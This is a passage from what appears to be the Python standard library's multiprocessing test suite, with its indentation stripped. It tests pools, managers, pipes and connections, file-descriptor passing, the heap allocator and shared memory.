class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaises(ValueError):
sl[4] = 'far too many' # Exceeds available storage.
self.assertEqual(sl[4], 'some')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
